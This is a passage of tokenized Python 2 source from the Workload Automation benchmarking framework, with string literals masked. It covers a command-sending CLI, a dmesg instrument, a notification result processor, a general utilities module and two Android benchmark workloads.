"<STR_LIT>" , '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" , str ( pid ) ] ) <EOL> return set ( procs . split ( ) ) <EOL> else : <EOL> return [ ] <EOL> def run_send_command ( ) : <EOL> """<STR_LIT>""" <EOL> parser = get_config_parser ( ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , metavar = '<STR_LIT>' , default = '<STR_LIT:.>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:store_true>' , default = False ) <EOL> args = parser . parse_args ( ) <EOL> if not args . device_config . labels : <EOL> args . device_config . labels = [ '<STR_LIT>' . format ( i ) for i in xrange ( len ( args . device_config . resistor_values ) ) ] <EOL> if args . verbose : <EOL> log . start_logging ( '<STR_LIT>' ) <EOL> else : <EOL> log . start_logging ( '<STR_LIT>' , fmt = '<STR_LIT>' ) <EOL> if args . command == '<STR_LIT>' : <EOL> args . device_config . validate ( ) <EOL> command = Command ( args . command , config = args . device_config ) <EOL> elif args . command == '<STR_LIT>' : <EOL> command = Command ( args . command , output_directory = args . output_directory ) <EOL> else : <EOL> command = Command ( args . command ) <EOL> result = execute_command ( args . server_config , command ) <EOL> print result <EOL> if result . data : <EOL> print result . data <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run_send_command ( ) </s>
<s> import os <EOL> from wlauto import Instrument , Parameter <EOL> from wlauto . utils . misc import ensure_file_directory_exists as _f <EOL> class DmesgInstrument ( Instrument ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> parameters = [ <EOL> Parameter ( '<STR_LIT>' , kind = int , allowed_values = range ( <NUM_LIT:8> ) , <EOL> description = '<STR_LIT>' ) <EOL> ] <EOL> loglevel_file = '<STR_LIT>' <EOL> def setup ( self , context ) : <EOL> if self . loglevel : <EOL> self . old_loglevel = self . device . get_sysfile_value ( self . loglevel_file ) <EOL> self . device . set_sysfile_value ( self . loglevel_file , self . loglevel , verify = False ) <EOL> self . before_file = _f ( os . path . join ( context . output_directory , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . after_file = _f ( os . path . join ( context . output_directory , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def slow_start ( self , context ) : <EOL> with open ( self . before_file , '<STR_LIT:w>' ) as wfh : <EOL> wfh . write ( self . device . execute ( '<STR_LIT>' ) ) <EOL> context . add_artifact ( '<STR_LIT>' , self . before_file , kind = '<STR_LIT:data>' ) <EOL> if self . device . is_rooted : <EOL> self . device . execute ( '<STR_LIT>' , as_root = True ) <EOL> def slow_stop ( self , context ) : <EOL> with open ( self . after_file , '<STR_LIT:w>' ) as wfh : <EOL> wfh . write ( self . device . execute ( '<STR_LIT>' ) ) <EOL> context . add_artifact ( '<STR_LIT>' , self . after_file , kind = '<STR_LIT:data>' ) <EOL> def teardown ( self , context ) : <EOL> if self . loglevel : <EOL> self . device . set_sysfile_value ( self . loglevel_file , self . old_loglevel , verify = False ) </s>
<s> import collections <EOL> import sys <EOL> try : <EOL> import notify2 <EOL> except ImportError : <EOL> notify2 = None <EOL> from wlauto import ResultProcessor <EOL> from wlauto . core . result import IterationResult <EOL> from wlauto . exceptions import ResultProcessorError <EOL> class NotifyProcessor ( ResultProcessor ) : <EOL> name = '<STR_LIT>' <EOL> description = '''<STR_LIT>''' <EOL> def initialize ( self , context ) : <EOL> if sys . platform != '<STR_LIT>' : <EOL> raise ResultProcessorError ( '<STR_LIT>' ) <EOL> if not notify2 : <EOL> raise ResultProcessorError ( '<STR_LIT>' ) <EOL> notify2 . init ( "<STR_LIT>" ) <EOL> def process_run_result ( self , result , context ) : <EOL> num_iterations = sum ( context . job_iteration_counts . values ( ) ) <EOL> counter = collections . Counter ( ) <EOL> for result in result . iteration_results : <EOL> counter [ result . status ] += <NUM_LIT:1> <EOL> score_board = [ ] <EOL> for status in IterationResult . values : <EOL> if status in counter : <EOL> score_board . append ( '<STR_LIT>' . format ( counter [ status ] , status ) ) <EOL> summary = '<STR_LIT>' <EOL> body = '<STR_LIT>' . format ( num_iterations ) <EOL> body += '<STR_LIT:U+002CU+0020>' . join ( score_board ) <EOL> notification = notify2 . Notification ( summary , body ) <EOL> if not notification . show ( ) : <EOL> self . logger . warning ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import os <EOL> import sys <EOL> import re <EOL> import math <EOL> import imp <EOL> import string <EOL> import threading <EOL> import signal <EOL> import pkgutil <EOL> import traceback <EOL> import logging <EOL> import random <EOL> import hashlib <EOL> import subprocess <EOL> from subprocess import CalledProcessError <EOL> from datetime import datetime , timedelta <EOL> from operator import mul , itemgetter <EOL> from StringIO import StringIO <EOL> from itertools import cycle , groupby <EOL> from functools import partial <EOL> from distutils . spawn import find_executable <EOL> import yaml <EOL> from dateutil import tz <EOL> ABI_MAP = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } <EOL> def preexec_function ( ) : <EOL> signal . signal ( signal . SIGINT , signal . SIG_IGN ) <EOL> os . setpgrp ( ) <EOL> check_output_logger = logging . getLogger ( '<STR_LIT>' ) <EOL> class TimeoutError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , command , output ) : <EOL> super ( TimeoutError , self ) . __init__ ( '<STR_LIT>' . format ( command ) ) <EOL> self . command = command <EOL> self . output = output <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT:\n>' . join ( [ self . message , '<STR_LIT>' , self . output or '<STR_LIT>' ] ) <EOL> class CalledProcessErrorWithStderr ( CalledProcessError ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . error = kwargs . pop ( "<STR_LIT:error>" ) <EOL> super ( CalledProcessErrorWithStderr , self ) . __init__ ( * args , ** kwargs ) <EOL> def check_output ( command , timeout = None , ignore = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ignore is None : <EOL> ignore = [ ] <EOL> elif isinstance ( ignore , int ) : <EOL> ignore = [ ignore ] <EOL> elif not isinstance ( ignore , list ) and ignore != '<STR_LIT:all>' : <EOL> message = '<STR_LIT>' <EOL> raise ValueError ( message . format ( ignore ) ) <EOL> if '<STR_LIT>' in kwargs : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def callback ( pid ) : <EOL> try : <EOL> check_output_logger . debug ( '<STR_LIT>' . format ( pid ) ) <EOL> os . killpg ( pid , signal . SIGKILL ) <EOL> except OSError : <EOL> pass <EOL> process = subprocess . Popen ( command , stdout = subprocess . PIPE , stderr = subprocess . PIPE , <EOL> preexec_fn = preexec_function , ** kwargs ) <EOL> if timeout : <EOL> timer = threading . Timer ( timeout , callback , [ process . pid , ] ) <EOL> timer . start ( ) <EOL> try : <EOL> output , error = process . communicate ( ) <EOL> finally : <EOL> if timeout : <EOL> timer . cancel ( ) <EOL> retcode = process . poll ( ) <EOL> if retcode : <EOL> if retcode == - <NUM_LIT:9> : <EOL> raise TimeoutError ( command , output = '<STR_LIT:\n>' . join ( [ output , error ] ) ) <EOL> elif ignore != '<STR_LIT:all>' and retcode not in ignore : <EOL> raise CalledProcessErrorWithStderr ( retcode , command , output = output , error = error ) <EOL> return output , error <EOL> def walk_modules ( path ) : <EOL> """<STR_LIT>""" <EOL> root_mod = __import__ ( path , { } , { } , [ '<STR_LIT>' ] ) <EOL> mods = [ root_mod ] <EOL> for _ , name , ispkg in pkgutil . iter_modules ( root_mod . __path__ ) : <EOL> submod_path = '<STR_LIT:.>' . join ( [ path , name ] ) <EOL> if ispkg : <EOL> mods . extend ( walk_modules ( submod_path ) ) <EOL> else : <EOL> submod = __import__ ( submod_path , { } , { } , [ '<STR_LIT>' ] ) <EOL> mods . append ( submod ) <EOL> return mods <EOL> def ensure_directory_exists ( dirpath ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isdir ( dirpath ) : <EOL> os . makedirs ( dirpath ) <EOL> return dirpath <EOL> def ensure_file_directory_exists ( filepath ) : <EOL> """<STR_LIT>""" <EOL> ensure_directory_exists ( os . path . dirname ( filepath ) ) <EOL> return filepath <EOL> def diff_tokens ( before_token , after_token ) : <EOL> """<STR_LIT>""" <EOL> if before_token . isspace ( ) and after_token . isspace ( ) : <EOL> return after_token <EOL> elif before_token . isdigit ( ) and after_token . isdigit ( ) : <EOL> try : <EOL> diff = int ( after_token ) - int ( before_token ) <EOL> return str ( diff ) <EOL> except ValueError : <EOL> return "<STR_LIT>" % ( before_token , after_token ) <EOL> elif before_token == after_token : <EOL> return after_token <EOL> else : <EOL> return "<STR_LIT>" % ( before_token , after_token ) <EOL> def prepare_table_rows ( rows ) : <EOL> """<STR_LIT>""" <EOL> rows = [ map ( str , r ) for r in rows ] <EOL> max_cols = max ( map ( len , rows ) ) <EOL> for row in rows : <EOL> pad = max_cols - len ( row ) <EOL> for _ in xrange ( pad ) : <EOL> row . append ( '<STR_LIT>' ) <EOL> return rows <EOL> def write_table ( rows , wfh , align = '<STR_LIT:>>' , headers = None ) : <EOL> """<STR_LIT>""" <EOL> if not rows : <EOL> return <EOL> rows = prepare_table_rows ( rows ) <EOL> num_cols = len ( rows [ <NUM_LIT:0> ] ) <EOL> it = cycle ( align ) <EOL> align = [ it . next ( ) for _ in xrange ( num_cols ) ] <EOL> cols = zip ( * rows ) <EOL> col_widths = [ max ( map ( len , c ) ) for c in cols ] <EOL> row_format = '<STR_LIT:U+0020>' . join ( [ '<STR_LIT>' % ( align [ i ] , w ) for i , w in enumerate ( col_widths ) ] ) <EOL> row_format += '<STR_LIT:\n>' <EOL> if headers : <EOL> wfh . write ( row_format . format ( * headers ) ) <EOL> underlines = [ '<STR_LIT:->' * len ( h ) for h in headers ] <EOL> wfh . write ( row_format . format ( * underlines ) ) <EOL> for row in rows : <EOL> wfh . write ( row_format . format ( * row ) ) <EOL> def get_null ( ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' if os . name == '<STR_LIT>' else '<STR_LIT>' <EOL> def get_traceback ( exc = None ) : <EOL> """<STR_LIT>""" <EOL> if exc is None : <EOL> exc = sys . exc_info ( ) <EOL> if not exc : <EOL> return None <EOL> tb = exc [ <NUM_LIT:2> ] <EOL> sio = StringIO ( ) <EOL> traceback . print_tb ( tb , file = sio ) <EOL> del tb <EOL> return sio . getvalue ( ) <EOL> def merge_dicts ( * args , ** kwargs ) : <EOL> if len ( args ) < <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> func = partial ( _merge_two_dicts , ** kwargs ) <EOL> return reduce ( func , args ) <EOL> def _merge_two_dicts ( base , other , list_duplicates = '<STR_LIT:all>' , match_types = False , <EOL> dict_type = dict , should_normalize = True , should_merge_lists = True ) : <EOL> """<STR_LIT>""" <EOL> merged = dict_type ( ) <EOL> base_keys = base . keys ( ) <EOL> other_keys = other . keys ( ) <EOL> norm = normalize if should_normalize else lambda x , y : x <EOL> base_only = [ ] <EOL> other_only = [ ] <EOL> both = [ ] <EOL> union = [ ] <EOL> for k in base_keys : <EOL> if k in other_keys : <EOL> both . append ( k ) <EOL> else : <EOL> base_only . append ( k ) <EOL> union . append ( k ) <EOL> for k in other_keys : <EOL> if k in base_keys : <EOL> union . append ( k ) <EOL> else : <EOL> union . append ( k ) <EOL> other_only . append ( k ) <EOL> for k in union : <EOL> if k in base_only : <EOL> merged [ k ] = norm ( base [ k ] , dict_type ) <EOL> elif k in other_only : <EOL> merged [ k ] = norm ( other [ k ] , dict_type ) <EOL> elif k in both : <EOL> base_value = base [ k ] <EOL> other_value = other [ k ] <EOL> base_type = type ( base_value ) <EOL> other_type = type ( other_value ) <EOL> if ( match_types and ( base_type != other_type ) and <EOL> ( base_value is not None ) and ( other_value is not None ) ) : <EOL> raise ValueError ( '<STR_LIT>' . format ( k , base_value , base_type , <EOL> other_value , other_type ) ) <EOL> if isinstance ( base_value , dict ) : <EOL> merged [ k ] = _merge_two_dicts ( base_value , other_value , list_duplicates , match_types , dict_type ) <EOL> elif isinstance ( base_value , list ) : <EOL> if should_merge_lists : <EOL> merged [ k ] = _merge_two_lists ( base_value , other_value , list_duplicates , dict_type ) <EOL> else : <EOL> merged [ k ] = _merge_two_lists ( [ ] , other_value , list_duplicates , dict_type ) <EOL> elif isinstance ( base_value , set ) : <EOL> merged [ k ] = norm ( base_value . union ( other_value ) , dict_type ) <EOL> else : <EOL> merged [ k ] = norm ( other_value , dict_type ) <EOL> else : <EOL> raise AssertionError ( '<STR_LIT>' . format ( k ) ) <EOL> return merged <EOL> def merge_lists ( * args , ** kwargs ) : <EOL> if len ( args ) < <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> func = partial ( _merge_two_lists , ** kwargs ) <EOL> return reduce ( func , args ) <EOL> def _merge_two_lists ( base , other , duplicates = '<STR_LIT:all>' , dict_type = dict ) : <EOL> """<STR_LIT>""" <EOL> if not isiterable ( base ) : <EOL> base = [ base ] <EOL> if not isiterable ( other ) : <EOL> other = [ other ] <EOL> if duplicates == '<STR_LIT:all>' : <EOL> merged_list = [ ] <EOL> for v in normalize ( base , dict_type ) + normalize ( other , dict_type ) : <EOL> if not _check_remove_item ( merged_list , v ) : <EOL> merged_list . append ( v ) <EOL> return merged_list <EOL> elif duplicates == '<STR_LIT>' : <EOL> base_norm = normalize ( base , dict_type ) <EOL> merged_list = normalize ( base , dict_type ) <EOL> for v in base_norm : <EOL> _check_remove_item ( merged_list , v ) <EOL> for v in normalize ( other , dict_type ) : <EOL> if not _check_remove_item ( merged_list , v ) : <EOL> if v not in base_norm : <EOL> merged_list . append ( v ) <EOL> return merged_list <EOL> elif duplicates == '<STR_LIT>' : <EOL> other_norm = normalize ( other , dict_type ) <EOL> merged_list = [ ] <EOL> for v in normalize ( base , dict_type ) : <EOL> if not _check_remove_item ( merged_list , v ) : <EOL> if v not in other_norm : <EOL> merged_list . append ( v ) <EOL> for v in other_norm : <EOL> if not _check_remove_item ( merged_list , v ) : <EOL> merged_list . append ( v ) <EOL> return merged_list <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' . format ( duplicates ) + <EOL> '<STR_LIT>' ) <EOL> def _check_remove_item ( the_list , item ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( item , basestring ) : <EOL> return False <EOL> if not item . startswith ( '<STR_LIT>' ) : <EOL> return False <EOL> actual_item = item [ <NUM_LIT:1> : ] <EOL> if actual_item in the_list : <EOL> del the_list [ the_list . index ( actual_item ) ] <EOL> return True <EOL> def normalize ( value , dict_type = dict ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , dict ) : <EOL> normalized = dict_type ( ) <EOL> for k , v in value . iteritems ( ) : <EOL> if isinstance ( k , basestring ) : <EOL> k = k . strip ( ) . lower ( ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> normalized [ k ] = normalize ( v , dict_type ) <EOL> return normalized <EOL> elif isinstance ( value , list ) : <EOL> return [ normalize ( v , dict_type ) for v in value ] <EOL> elif isinstance ( value , tuple ) : <EOL> return tuple ( [ normalize ( v , dict_type ) for v in value ] ) <EOL> else : <EOL> return value <EOL> VALUE_REGEX = re . compile ( r'<STR_LIT>' ) <EOL> UNITS_MAP = { <EOL> '<STR_LIT:s>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:A>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def parse_value ( value_string ) : <EOL> """<STR_LIT>""" <EOL> match = VALUE_REGEX . search ( value_string ) <EOL> if match : <EOL> vs = match . group ( <NUM_LIT:1> ) <EOL> value = float ( vs ) if '<STR_LIT:.>' in vs else int ( vs ) <EOL> us = match . group ( <NUM_LIT:2> ) <EOL> units = UNITS_MAP . get ( us , us ) <EOL> return ( value , units ) <EOL> else : <EOL> return ( value_string , None ) <EOL> def get_meansd ( values ) : <EOL> """<STR_LIT>""" <EOL> if not values : <EOL> return float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) <EOL> mean = sum ( values ) / len ( values ) <EOL> sd = math . sqrt ( sum ( [ ( v - mean ) ** <NUM_LIT:2> for v in values ] ) / len ( values ) ) <EOL> return mean , sd <EOL> def geomean ( values ) : <EOL> """<STR_LIT>""" <EOL> return reduce ( mul , values ) ** ( <NUM_LIT:1.0> / len ( values ) ) <EOL> def capitalize ( text ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return '<STR_LIT>' <EOL> return text [ <NUM_LIT:0> ] . upper ( ) + text [ <NUM_LIT:1> : ] . lower ( ) <EOL> def convert_new_lines ( text ) : <EOL> """<STR_LIT>""" <EOL> return text . replace ( '<STR_LIT:\r\n>' , '<STR_LIT:\n>' ) . replace ( '<STR_LIT:\r>' , '<STR_LIT:\n>' ) <EOL> def escape_quotes ( text ) : <EOL> """<STR_LIT>""" <EOL> return re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , text ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def escape_single_quotes ( text ) : <EOL> """<STR_LIT>""" <EOL> return re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , text ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def escape_double_quotes ( text ) : <EOL> """<STR_LIT>""" <EOL> return re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , text ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def getch ( count = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> if os . name == '<STR_LIT>' : <EOL> import msvcrt <EOL> return '<STR_LIT>' . join ( [ msvcrt . getch ( ) for _ in xrange ( count ) ] ) <EOL> else : <EOL> import tty <EOL> import termios <EOL> fd = sys . stdin . fileno ( ) <EOL> old_settings = termios . tcgetattr ( fd ) <EOL> try : <EOL> tty . setraw ( sys . stdin . fileno ( ) ) <EOL> ch = sys . stdin . read ( count ) <EOL> finally : <EOL> termios . tcsetattr ( fd , termios . TCSADRAIN , old_settings ) <EOL> return ch <EOL> def isiterable ( obj ) : <EOL> """<STR_LIT>""" <EOL> return hasattr ( obj , '<STR_LIT>' ) and not isinstance ( obj , basestring ) <EOL> def utc_to_local ( dt ) : <EOL> """<STR_LIT>""" <EOL> return dt . replace ( tzinfo = tz . tzutc ( ) ) . astimezone ( tz . tzlocal ( ) ) <EOL> def local_to_utc ( dt ) : <EOL> """<STR_LIT>""" <EOL> return dt . replace ( tzinfo = tz . tzlocal ( ) ) . astimezone ( tz . tzutc ( ) ) <EOL> def as_relative ( path ) : <EOL> """<STR_LIT>""" <EOL> path = os . path . splitdrive ( path ) [ <NUM_LIT:1> ] <EOL> return path . lstrip ( os . sep ) <EOL> def get_cpu_mask ( cores ) : <EOL> """<STR_LIT>""" <EOL> mask = <NUM_LIT:0> <EOL> for i in cores : <EOL> mask |= <NUM_LIT:1> << i <EOL> return '<STR_LIT>' . format ( mask ) <EOL> def load_class ( classpath ) : <EOL> """<STR_LIT>""" <EOL> modname , clsname = classpath . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> return getattr ( __import__ ( modname ) , clsname ) <EOL> def get_pager ( ) : <EOL> """<STR_LIT>""" <EOL> pager = os . getenv ( '<STR_LIT>' ) <EOL> if pager is None : <EOL> pager = find_executable ( '<STR_LIT>' ) <EOL> if pager is None : <EOL> pager = find_executable ( '<STR_LIT>' ) <EOL> return pager <EOL> def enum_metaclass ( enum_param , return_name = False , start = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> class __EnumMeta ( type ) : <EOL> def __new__ ( mcs , clsname , bases , attrs ) : <EOL> cls = type . __new__ ( mcs , clsname , bases , attrs ) <EOL> values = getattr ( cls , enum_param , [ ] ) <EOL> if return_name : <EOL> for name in values : <EOL> setattr ( cls , name , name ) <EOL> else : <EOL> if isinstance ( values , list ) or isinstance ( values , tuple ) : <EOL> for i , name in enumerate ( values ) : <EOL> setattr ( cls , name , i + start ) <EOL> else : <EOL> for name in values : <EOL> setattr ( cls , name , values [ name ] ) <EOL> return cls <EOL> return __EnumMeta <EOL> def which ( name ) : <EOL> """<STR_LIT>""" <EOL> if os . name == '<STR_LIT>' : <EOL> paths = os . getenv ( '<STR_LIT>' ) . split ( os . pathsep ) <EOL> exts = os . getenv ( '<STR_LIT>' ) . split ( os . pathsep ) <EOL> for path in paths : <EOL> testpath = os . path . join ( path , name ) <EOL> if os . path . isfile ( testpath ) : <EOL> return testpath <EOL> for ext in exts : <EOL> testpathext = testpath + ext <EOL> if os . path . isfile ( testpathext ) : <EOL> return testpathext <EOL> return None <EOL> else : <EOL> try : <EOL> return check_output ( [ '<STR_LIT>' , name ] ) [ <NUM_LIT:0> ] . strip ( ) <EOL> except subprocess . CalledProcessError : <EOL> return None <EOL> _bash_color_regex = re . compile ( '<STR_LIT>' ) <EOL> def strip_bash_colors ( text ) : <EOL> return _bash_color_regex . sub ( '<STR_LIT>' , text ) <EOL> def format_duration ( seconds , sep = '<STR_LIT:U+0020>' , order = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( seconds , timedelta ) : <EOL> td = seconds <EOL> else : <EOL> td = timedelta ( seconds = seconds ) <EOL> dt = datetime ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) + td <EOL> result = [ ] <EOL> for item in order : <EOL> value = getattr ( dt , item , None ) <EOL> if item is '<STR_LIT>' : <EOL> value -= <NUM_LIT:1> <EOL> if not value : <EOL> continue <EOL> suffix = '<STR_LIT>' if value == <NUM_LIT:1> else '<STR_LIT:s>' <EOL> result . append ( '<STR_LIT>' . format ( value , item , suffix ) ) <EOL> return sep . join ( result ) <EOL> def get_article ( word ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' if word [ <NUM_LIT:0> ] in '<STR_LIT>' else '<STR_LIT:a>' <EOL> def get_random_string ( length ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . join ( random . choice ( string . ascii_letters + string . digits ) for _ in xrange ( length ) ) <EOL> class LoadSyntaxError ( Exception ) : <EOL> def __init__ ( self , message , filepath , lineno ) : <EOL> super ( LoadSyntaxError , self ) . __init__ ( message ) <EOL> self . filepath = filepath <EOL> self . lineno = lineno <EOL> def __str__ ( self ) : <EOL> message = '<STR_LIT>' <EOL> return message . format ( self . filepath , self . lineno , self . message ) <EOL> RAND_MOD_NAME_LEN = <NUM_LIT:30> <EOL> BAD_CHARS = string . punctuation + string . whitespace <EOL> TRANS_TABLE = string . maketrans ( BAD_CHARS , '<STR_LIT:_>' * len ( BAD_CHARS ) ) <EOL> def to_identifier ( text ) : <EOL> """<STR_LIT>""" <EOL> return re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , text . translate ( TRANS_TABLE ) ) <EOL> def load_struct_from_python ( filepath = None , text = None ) : <EOL> """<STR_LIT>""" <EOL> if not ( filepath or text ) or ( filepath and text ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> try : <EOL> if filepath : <EOL> modname = to_identifier ( filepath ) <EOL> mod = imp . load_source ( modname , filepath ) <EOL> else : <EOL> modname = get_random_string ( RAND_MOD_NAME_LEN ) <EOL> while modname in sys . modules : <EOL> modname = get_random_string ( RAND_MOD_NAME_LEN ) <EOL> mod = imp . new_module ( modname ) <EOL> exec text in mod . __dict__ <EOL> return dict ( ( k , v ) <EOL> for k , v in mod . __dict__ . iteritems ( ) <EOL> if not k . startswith ( '<STR_LIT:_>' ) ) <EOL> except SyntaxError as e : <EOL> raise LoadSyntaxError ( e . message , filepath , e . lineno ) <EOL> def load_struct_from_yaml ( filepath = None , text = None ) : <EOL> """<STR_LIT>""" <EOL> if not ( filepath or text ) or ( filepath and text ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> try : <EOL> if filepath : <EOL> with open ( filepath ) as fh : <EOL> return yaml . load ( fh ) <EOL> else : <EOL> return yaml . load ( text ) <EOL> except yaml . YAMLError as e : <EOL> lineno = None <EOL> if hasattr ( e , '<STR_LIT>' ) : <EOL> lineno = e . problem_mark . line <EOL> raise LoadSyntaxError ( e . message , filepath = filepath , lineno = lineno ) <EOL> def load_struct_from_file ( filepath ) : <EOL> """<STR_LIT>""" <EOL> extn = os . path . splitext ( filepath ) [ <NUM_LIT:1> ] . lower ( ) <EOL> if ( extn == '<STR_LIT>' ) or ( extn == '<STR_LIT>' ) or ( extn == '<STR_LIT>' ) : <EOL> return load_struct_from_python ( filepath ) <EOL> elif extn == '<STR_LIT>' : <EOL> return load_struct_from_yaml ( filepath ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' . format ( extn , filepath ) ) <EOL> def unique ( alist ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for item in alist : <EOL> if item not in result : <EOL> result . append ( item ) <EOL> return result <EOL> def open_file ( filepath ) : <EOL> """<STR_LIT>""" <EOL> if os . name == '<STR_LIT>' : <EOL> return os . startfile ( filepath ) <EOL> elif sys . platform == '<STR_LIT>' : <EOL> return subprocess . call ( [ '<STR_LIT>' , filepath ] ) <EOL> else : <EOL> return subprocess . call ( [ '<STR_LIT>' , filepath ] ) <EOL> def ranges_to_list ( ranges_string ) : <EOL> """<STR_LIT>""" <EOL> values = [ ] <EOL> for rg in ranges_string . split ( '<STR_LIT:U+002C>' ) : <EOL> if '<STR_LIT:->' in rg : <EOL> first , last = map ( int , rg . split ( '<STR_LIT:->' ) ) <EOL> values . extend ( xrange ( first , last + <NUM_LIT:1> ) ) <EOL> else : <EOL> values . append ( int ( rg ) ) <EOL> return values <EOL> def list_to_ranges ( values ) : <EOL> """<STR_LIT>""" <EOL> range_groups = [ ] <EOL> for _ , g in groupby ( enumerate ( values ) , lambda ( i , x ) : i - x ) : <EOL> range_groups . append ( map ( itemgetter ( <NUM_LIT:1> ) , g ) ) <EOL> range_strings = [ ] <EOL> for group in range_groups : <EOL> if len ( group ) == <NUM_LIT:1> : <EOL> range_strings . append ( str ( group [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> range_strings . append ( '<STR_LIT>' . format ( group [ <NUM_LIT:0> ] , group [ - <NUM_LIT:1> ] ) ) <EOL> return '<STR_LIT:U+002C>' . join ( range_strings ) <EOL> def list_to_mask ( values , base = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> for v in values : <EOL> base |= ( <NUM_LIT:1> << v ) <EOL> return base <EOL> def mask_to_list ( mask ) : <EOL> """<STR_LIT>""" <EOL> size = len ( bin ( mask ) ) - <NUM_LIT:2> <EOL> return [ size - i - <NUM_LIT:1> for i in xrange ( size ) <EOL> if mask & ( <NUM_LIT:1> << size - i - <NUM_LIT:1> ) ] <EOL> def sha256 ( path , chunk = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> h = hashlib . sha256 ( ) <EOL> with open ( path , '<STR_LIT:rb>' ) as fh : <EOL> buf = fh . read ( chunk ) <EOL> while buf : <EOL> h . update ( buf ) <EOL> buf = fh . read ( chunk ) <EOL> return h . hexdigest ( ) <EOL> def urljoin ( * parts ) : <EOL> return '<STR_LIT:/>' . join ( p . rstrip ( '<STR_LIT:/>' ) for p in parts ) </s>
<s> import time <EOL> from wlauto import GameWorkload , Parameter <EOL> class EpicCitadel ( GameWorkload ) : <EOL> name = '<STR_LIT>' <EOL> description = """<STR_LIT>""" <EOL> package = '<STR_LIT>' <EOL> activity = '<STR_LIT>' <EOL> install_timeout = <NUM_LIT> <EOL> parameters = [ <EOL> Parameter ( '<STR_LIT>' , kind = int , default = <NUM_LIT> , <EOL> description = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) , <EOL> ] <EOL> def run ( self , context ) : <EOL> super ( EpicCitadel , self ) . run ( context ) <EOL> time . sleep ( self . duration ) </s>
<s> import re <EOL> from wlauto import AndroidUiAutoBenchmark , Parameter <EOL> class RealLinpack ( AndroidUiAutoBenchmark ) : <EOL> name = '<STR_LIT>' <EOL> description = """<STR_LIT>""" <EOL> package = '<STR_LIT>' <EOL> activity = '<STR_LIT>' <EOL> parameters = [ <EOL> Parameter ( '<STR_LIT>' , kind = int , default = <NUM_LIT:16> , constraint = lambda x : x > <NUM_LIT:0> , <EOL> description = '<STR_LIT>' ) , <EOL> ] <EOL> def __init__ ( self , device , ** kwargs ) : <EOL> super ( RealLinpack , self ) . __init__ ( device , ** kwargs ) <EOL> self . uiauto_params [ '<STR_LIT>' ] = self . max_threads <EOL> self . run_timeout = <NUM_LIT> + <NUM_LIT> * self . max_threads <EOL> def update_result ( self , context ) : <EOL> super ( RealLinpack , self ) . update_result ( context ) <EOL> score_regex = re . compile ( r'<STR_LIT>' ) <EOL> match_found = False <EOL> with open ( self . logcat_log ) as logcat_file : <EOL> for line in logcat_file : <EOL> match = re . search ( score_regex , line ) <EOL> if match : <EOL> number_of_threads = match . group ( <NUM_LIT:1> ) <EOL> score = match . group ( <NUM_LIT:2> ) <EOL> context . result . add_metric ( '<STR_LIT>' , number_of_threads , None ) <EOL> context . result . add_metric ( '<STR_LIT>' , score , '<STR_LIT>' ) <EOL> match_found = True <EOL> break <EOL> if not match_found : <EOL> self . logger . warning ( 